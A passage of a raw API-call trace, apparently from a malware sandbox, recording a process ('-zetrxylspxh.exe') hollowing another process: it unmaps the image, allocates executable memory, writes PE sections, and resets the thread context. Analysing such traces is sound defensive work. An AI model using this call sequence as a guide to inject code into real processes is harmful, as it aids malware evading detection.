Ebx=0x228000, Edx=0x0, Ecx=0x0, Eax=0x40312a, Ebp=0x0, Eip=0x77d58fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25, [5]=0x2, [6]=0x0, [7]=0xc0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x48, [13]=0xea, [14]=0x19, [15]=0x0, [16]=0x2b, [17]=0xba, [18]=0xd1, [19]=0x77, [20]=0xd0, [21]=0xea, [22]=0x19, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x9, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x98, [37]=0xea, [38]=0x19, [39]=0x0, [40]=0x33, [41]=0xb8, [42]=0xd1, [43]=0x77, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x59, [49]=0xb8, [50]=0xd1, [51]=0x77, [52]=0x9c, [53]=0xb7, [54]=0x71, [55]=0xc6, [56]=0x10, [57]=0xec, [58]=0x19, [59]=0x0, [60]=0xa0, [61]=0xec, [62]=0x19, [63]=0x0, [64]=0x8, [65]=0xec, [66]=0x19, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x94, [73]=0xea, [74]=0x19, [75]=0x0, [76]=0xd0, [77]=0xea, [78]=0x19, [79]=0x0, [80]=0x10, [81]=0xec, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0xd8, [89]=0xea, [90]=0x19, [91]=0x0, [92]=0x58, [93]=0xea, [94]=0x19, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x1c, [101]=0xf7, [102]=0x19, [103]=0x0, [104]=0x30, [105]=0xee, [106]=0xd5, [107]=0x77, [108]=0x2c, [109]=0x7c, [110]=0xb5, [111]=0xb1, [112]=0xfe, [113]=0xff, [114]=0xff, [115]=0xff, [116]=0x59, [117]=0xb8, [118]=0xd1, [119]=0x77, [120]=0x9e, [121]=0x1, [122]=0xd2, [123]=0x77, [124]=0x20, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x4, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x8, [141]=0xec, [142]=0x19, [143]=0x0, [144]=0xcc, [145]=0xea, [146]=0x19, [147]=0x0, [148]=0x1, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xa0, [153]=0xec, [154]=0x19, [155]=0x0, [156]=0xc0, [157]=0x1, [158]=0xd2, [159]=0x77, [160]=0x78, [161]=0xb7, [162]=0x71, [163]=0xc6, [164]=0x20, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x12, [173]=0x0, [174]=0x0, [175]=0x1, [176]=0xd8, [177]=0xea, [178]=0x19, [179]=0x0, [180]=0x6e, [181]=0x0, [182]=0x74, [183]=0x0, [184]=0x64, [185]=0x0, [186]=0x6c, [187]=0x0, [188]=0x6c, [189]=0x0, [190]=0x2e, [191]=0x0, [192]=0x64, [193]=0x0, [194]=0x6c, [195]=0x0, [196]=0x6c, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa3, [205]=0x97, [206]=0xd1, [207]=0x77, [208]=0x2, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x40, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0xe4, [277]=0xeb, [278]=0x19, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x18, [287]=0x0, [288]=0x24, [289]=0xf6, [290]=0x19, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0xe0, [297]=0xeb, [298]=0x19, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0xe8, [313]=0xf1, [314]=0x19, [315]=0x0, [316]=0xc0, [317]=0x47, [318]=0x5c, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x2, [327]=0x0, [328]=0x80, [329]=0xeb, [330]=0x19, [331]=0x0, [332]=0x80, [333]=0xeb, [334]=0x19, [335]=0x0, [336]=0x80, [337]=0xeb, [338]=0x19, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x2, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x19, [351]=0x0, [352]=0x88, [353]=0xb6, [354]=0x71, [355]=0xc6, [356]=0x4, [357]=0xed, [358]=0x19, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xb5, [365]=0x93, [366]=0xd1, [367]=0x77, [368]=0x2c, [369]=0xec, [370]=0x19, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x2c, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0xa0, [381]=0xf1, [382]=0x19, [383]=0x0, [384]=0x24, [385]=0xf6, [386]=0x19, [387]=0x0, [388]=0x30, [389]=0x94, [390]=0xd1, [391]=0x77, [392]=0xa8, [393]=0xef, [394]=0x19, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x1, [400]=0x16, [401]=0x0, [402]=0x18, [403]=0x0, [404]=0x24, [405]=0xf6, [406]=0x19, [407]=0x0, [408]=0xd4, [409]=0xeb, [410]=0x19, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0xd1, [415]=0x77, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x64, [425]=0xf1, [426]=0x19, [427]=0x0, [428]=0x9c, [429]=0xb7, [430]=0xd1, [431]=0x77, [432]=0x10, [433]=0xec, [434]=0x19, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0xc0, [441]=0xb7, [442]=0x71, [443]=0xc6, [444]=0x1, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x68, [449]=0xec, [450]=0x19, [451]=0x0, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xcd, [465]=0x35, [466]=0xd2, [467]=0x77, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x9, [477]=0x36, [478]=0xd2, [479]=0x77, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0xd8, [485]=0x15, [486]=0x59, [487]=0x0, [488]=0x94, [489]=0xec, [490]=0x19, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x64, [505]=0xf1, [506]=0x19, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0276.204] ReadProcessMemory (in: hProcess=0x244, lpBaseAddress=0x228008, lpBuffer=0x19ec9c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19ec9c*, lpNumberOfBytesRead=0x0) returned 1 [0276.204] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e510 | out: Wow64Process=0x19e510*=1) returned 1 [0276.205] lstrlenW (lpString="-zetrxylspxh.exe") returned 16 [0276.205] lstrlenW (lpString="ntdll.dll") returned 9 [0276.205] lstrlenW (lpString="ntdll.dll") returned 9 [0276.205] lstrlenW (lpString="ntdll.dll") returned 9 [0276.205] lstrlenW (lpString="ntdll.dll") returned 9 [0276.205] lstrlenW (lpString="tdll.dll") returned 8 [0276.205] lstrlenW (lpString="dll.dll") returned 7 [0276.205] lstrlenW (lpString="ll.dll") returned 6 [0276.205] lstrlenW (lpString="l.dll") returned 5 [0276.205] lstrlenW (lpString=".dll") returned 4 [0276.205] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0276.205] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0276.206] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe500000 [0276.206] ReadFile (in: hFile=0x24c, lpBuffer=0xe500000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19e4e4, lpOverlapped=0x0 | out: lpBuffer=0xe500000*, lpNumberOfBytesRead=0x19e4e4*=0x1784a0, lpOverlapped=0x0) returned 1 [0276.273] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe680000 [0276.308] CloseHandle (hObject=0x24c) returned 1 [0276.308] VirtualFree (lpAddress=0xe500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.315] VirtualFree (lpAddress=0xe680000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.322] NtUnmapViewOfSection (ProcessHandle=0x244, BaseAddress=0x400000) returned 0x0 [0276.324] VirtualAllocEx (hProcess=0x244, lpAddress=0x400000, dwSize=0x29000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0276.330] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e4e0 | out: Wow64Process=0x19e4e0*=1) returned 1 [0276.330] lstrlenW (lpString="-zetrxylspxh.exe") returned 16 [0276.330] lstrlenW (lpString="ntdll.dll") returned 9 [0276.330] lstrlenW (lpString="ntdll.dll") returned 9 [0276.330] lstrlenW (lpString="ntdll.dll") returned 9 [0276.330] lstrlenW (lpString="ntdll.dll") returned 9 [0276.330] lstrlenW (lpString="tdll.dll") returned 8 [0276.330] lstrlenW (lpString="dll.dll") returned 7 [0276.330] lstrlenW (lpString="ll.dll") returned 6 [0276.330] lstrlenW (lpString="l.dll") returned 5 [0276.330] lstrlenW (lpString=".dll") returned 4 [0276.330] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0276.331] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0276.331] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe500000 [0276.331] ReadFile (in: hFile=0x24c, lpBuffer=0xe500000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19e4b4, lpOverlapped=0x0 | out: lpBuffer=0xe500000*, lpNumberOfBytesRead=0x19e4b4*=0x1784a0, lpOverlapped=0x0) returned 1 [0276.363] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe680000 [0276.407] CloseHandle (hObject=0x24c) returned 1 [0276.407] VirtualFree (lpAddress=0xe500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.415] VirtualFree (lpAddress=0xe680000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.422] NtWriteVirtualMemory (in: ProcessHandle=0x244, BaseAddress=0x400000, Buffer=0xe4c0000*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x19e514 | out: Buffer=0xe4c0000*, NumberOfBytesWritten=0x19e514*=0x200) returned 0x0 [0276.430] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e4e0 | out: Wow64Process=0x19e4e0*=1) returned 1 [0276.430] lstrlenW (lpString="-zetrxylspxh.exe") returned 16 [0276.430] lstrlenW (lpString="ntdll.dll") returned 9 [0276.430] lstrlenW (lpString="ntdll.dll") returned 9 [0276.430] lstrlenW (lpString="ntdll.dll") returned 9 [0276.430] lstrlenW (lpString="ntdll.dll") returned 9 [0276.430] lstrlenW (lpString="tdll.dll") returned 8 [0276.430] lstrlenW (lpString="dll.dll") returned 7 [0276.430] lstrlenW (lpString="ll.dll") returned 6 [0276.430] lstrlenW (lpString="l.dll") returned 5 [0276.430] lstrlenW (lpString=".dll") returned 4 [0276.430] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0276.431] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0276.431] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe500000 [0276.431] ReadFile (in: hFile=0x24c, lpBuffer=0xe500000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19e4b4, lpOverlapped=0x0 | out: lpBuffer=0xe500000*, lpNumberOfBytesRead=0x19e4b4*=0x1784a0, lpOverlapped=0x0) returned 1 [0276.455] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe680000 [0276.487] CloseHandle (hObject=0x24c) returned 1 [0276.487] VirtualFree (lpAddress=0xe500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.494] VirtualFree (lpAddress=0xe680000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.501] NtWriteVirtualMemory (in: ProcessHandle=0x244, BaseAddress=0x401000, Buffer=0xe4c1000*, NumberOfBytesToWrite=0x27c00, NumberOfBytesWritten=0x19e514 | out: Buffer=0xe4c1000*, NumberOfBytesWritten=0x19e514*=0x27c00) returned 0x0 [0276.512] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e4e0 | out: Wow64Process=0x19e4e0*=1) returned 1 [0276.513] lstrlenW (lpString="-zetrxylspxh.exe") returned 16 [0276.513] lstrlenW (lpString="ntdll.dll") returned 9 [0276.513] lstrlenW (lpString="ntdll.dll") returned 9 [0276.513] lstrlenW (lpString="ntdll.dll") returned 9 [0276.513] lstrlenW (lpString="ntdll.dll") returned 9 [0276.513] lstrlenW (lpString="tdll.dll") returned 8 [0276.513] lstrlenW (lpString="dll.dll") returned 7 [0276.513] lstrlenW (lpString="ll.dll") returned 6 [0276.513] lstrlenW (lpString="l.dll") returned 5 [0276.513] lstrlenW (lpString=".dll") returned 4 [0276.513] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0276.513] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0276.513] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe500000 [0276.514] ReadFile (in: hFile=0x24c, lpBuffer=0xe500000, nNumberOfBytesToRead=0x1784a0, lpNumberOfBytesRead=0x19e4b4, lpOverlapped=0x0 | out: lpBuffer=0xe500000*, lpNumberOfBytesRead=0x19e4b4*=0x1784a0, lpOverlapped=0x0) returned 1 [0276.705] VirtualAlloc (lpAddress=0x0, dwSize=0x17b000, flAllocationType=0x3000, flProtect=0x4) returned 0xe680000 [0276.745] CloseHandle (hObject=0x24c) returned 1 [0276.747] VirtualFree (lpAddress=0xe500000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.757] VirtualFree (lpAddress=0xe680000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0276.765] NtWriteVirtualMemory (in: ProcessHandle=0x244, BaseAddress=0x228008, Buffer=0x19ecb0*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x19e514 | out: Buffer=0x19ecb0*, NumberOfBytesWritten=0x19e514*=0x4) returned 0x0 [0276.767] SetThreadContext (hThread=0x240, lpContext=0x19e958*(ContextFlags=0x10007, Dr0=0x77ce4090, Dr1=0x46f58, Dr2=0x1, Dr3=0x46f44, Dr6=0xffaa1b6c, Dr7=0x19e9a8, FloatSave.ControlWord=0x77d3f91c, FloatSave.StatusWord=0xc671b4ac, FloatSave.TagWord=0x19ec8c, FloatSave.ErrorOffset=0x57, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x1, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x78, [1]=0xe9, [2]=0x19, [3]=0x0, [4]=0x7e, [5]=0xc4, [6]=0xc1, [7]=0xf5, [8]=0xac, [9]=0xee, [10]=0x19, [11]=0x0, [12]=0x30, [13]=0xee, [14]=0xd5, [15]=0x77, [16]=0x7c, [17]=0x7d, [18]=0xb5, [19]=0xb1, [20]=0xfe, [21]=0xff, [22]=0xff, [23]=0xff, [24]=0x34, [25]=0xec, [26]=0x19, [27]=0x0, [28]=0x98, [29]=0x8d, [30]=0xd1, [31]=0x77, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x25, [37]=0x2, [38]=0x0, [39]=0xc0, [40]=0x78, [41]=0xec, [42]=0x19, [43]=0x0, [44]=0xc0, [45]=0x47, [46]=0x5c, [47]=0x0, [48]=0xad, [49]=0x8d, [50]=0xd1, [51]=0x77, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0xd8, [69]=0x15, [70]=0x59, [71]=0x0, [72]=0x9, [73]=0x1, [74]=0x1, [75]=0x1, [76]=0x14, [77]=0x16, [78]=0x59, [79]=0x0), FloatSave.Cr0NpxState=0xf46857d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x228000, Edx=0x0, Ecx=0x0, Eax=0x41d470, Ebp=0x0, Eip=0x77d58fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25, [5]=0x2, [6]=0x0, [7]=0xc0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x48, [13]=0xea, [14]=0x19, [15]=0x0, [16]=0x2b, [17]=0xba, [18]=0xd1, [19]=0x77, [20]=0xd0, [21]=0xea, [22]=0x19, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x9, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x98, [37]=0xea, [38]=0x19, [39]=0x0, [40]=0x33, [41]=0xb8, [42]=0xd1, [43]=0x77, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x59, [49]=0xb8, [50]=0xd1, [51]=0x77, [52]=0x9c, [53]=0xb7, [54]=0x71, [55]=0xc6, [56]=0x10, [57]=0xec, [58]=0x19, [59]=0x0, [60]=0xa0, [61]=0xec, [62]=0x19, [63]=0x0, [64]=0x8, [65]=0xec, [66]=0x19, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x94, [73]=0xea, [74]=0x19, [75]=0x0, [76]=0xd0, [77]=0xea, [78]=0x19, [79]=0x0, [80]=0x10, [81]=0xec, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0xd8, [89]=0xea, [90]=0x19, [91]=0x0, [92]=0x58, [93]=0xea, [94]=0x19, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x1c, [101]=0xf7, [102]=0x19, [103]=0x0, [104]=0x30, [105]=0xee, [106]=0xd5, [107]=0x77, [108]=0x2c, [109]=0x7c, [110]=0xb5, [111]=0xb1, [112]=0xfe, [113]=0xff, [114]=0xff, [115]=0xff, [116]=0x59, [117]=0xb8, [118]=0xd1, [119]=0x77, [120]=0x9e, [121]=0x1, [122]=0xd2, [123]=0x77, [124]=0x20, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x4, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x8, [141]=0xec, [142]=0x19, [143]=0x0, [144]=0xcc, [145]=0xea, [146]=0x19, [147]=0x0, [148]=0x1, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xa0, [153]=0xec, [154]=0x19, [155]=0x0, [156]=0xc0, [157]=0x1, [158]=0xd2, [159]=0x77, [160]=0x78, [161]=0xb7, [162]=0x71, [163]=0xc6, [164]=0x20, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x12, [173]=0x0, [174]=0x0, [175]=0x1, [176]=0xd8, [177]=0xea, [178]=0x19, [179]=0x0, [180]=0x6e, [181]=0x0, [182]=0x74, [183]=0x0, [184]=0x64, [185]=0x0, [186]=0x6c, [187]=0x0, [188]=0x6c, [189]=0x0, [190]=0x2e, [191]=0x0, [192]=0x64, [193]=0x0, [194]=0x6c, [195]=0x0, [196]=0x6c, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa3, [205]=0x97, [206]=0xd1, [207]=0x77, [208]=0x2, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x40, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0xe4, [277]=0xeb, [278]=0x19, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x18, [287]=0x0, [288]=0x24, [289]=0xf6, [290]=0x19, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0xe0, [297]=0xeb, [298]=0x19, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0xe8, [313]=0xf1, [314]=0x19, [315]=0x0, [316]=0xc0, [317]=0x47, [318]=0x5c, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x2, [327]=0x0, [328]=0x80, [329]=0xeb, [330]=0x19, [331]=0x0, [332]=0x80, [333]=0xeb, [334]=0x19, [335]=0x0, [336]=0x80, [337]=0xeb, [338]=0x19, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x2, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x19, [351]=0x0, [352]=0x88, [353]=0xb6, [354]=0x71, [355]=0xc6, [356]=0x4, [357]=0xed, [358]=0x19, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xb5, [365]=0x93, [366]=0xd1, [367]=0x77, [368]=0x2c, [369]=0xec, [370]=0x19, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x2c, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0xa0, [381]=0xf1, [382]=0x19, [383]=0x0, [384]=0x24, [385]=0xf6, [386]=0x19, [387]=0x0, [388]=0x30, [389]=0x94, [390]=0xd1, [391]=0x77, [392]=0xa8, [393]=0xef, [394]=0x19, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x1, [400]=0x16, [401]=0x0, [402]=0x18, [403]=0x0, [404]=0x24, [405]=0xf6, [406]=0x19, [407]=0x0, [408]=0xd4, [409]=0xeb, [410]=0x19, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0xd1, [415]=0x77, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x64, [425]=0xf1, [426]=0x19, [427]=0x0, [428]=0x9c, [429]=0xb7, [430]=0xd1, [431]=0x77, [432]=0x10, [433]=0xec, [434]=0x19, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0xc0, [441]=0xb7, [442]=0x71, [443]=0xc6, [444]=0x1, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x68, [449]=0xec, [450]=0x19, [451]=0x0, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xcd, [465]=0x35, [466]=0xd2, [467]=0x77, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x9, [477]=0x36, [478]=0xd2, [479]=0x77, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0xd8, [485]=0x15, [486]=0x59, [487]=0x0, [488]=0x94, [489]=0xec, [490]=0x19, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x64, [505]=0xf1, [506]=0x19, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0276.778] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19e508 | out: Wow64Process=0x19e508*=1) returned 1 [0276.778] lstrlenW (lpString="-zetrxylspxh.exe") returned 16 [0276.778] lstrlenW (lpString="ntdll.dll") returned 9 [0276.779] lstrlenW (lpString="ntdll.dll") returned 9 [0276.779] lstrlenW (lpString="ntdll.dll") returned 9 [0276.779] lstrlenW (lpString="ntdll.dll") returned 9 [0276.779] lstrlenW (lpString="tdll.dll") returned 8 [0276.779] lstrlenW (lpString="dll.dll") returned 7 [0276.779] lstrlenW (lpString="ll.dll") returned 6 [0276.779] lstrlenW (lpString="l.dll") returned 5 [0276.779] lstrlenW (lpString=".dll") returned 4 [0276.779] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24c [0276.779] GetFileSize (in: hFile=0x24c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1784a0 [0276.779] VirtualAlloc (lpAddress=0x0, dwSize=0x1784a0, flAllocationType=0x3000, flProtect=0x4) returned 0xe500000 [0276.780] ReadFile (in: hFile=0x24c, lpBuffer=0xe500000, nNumberOfBytesToRead=0x1784a0, 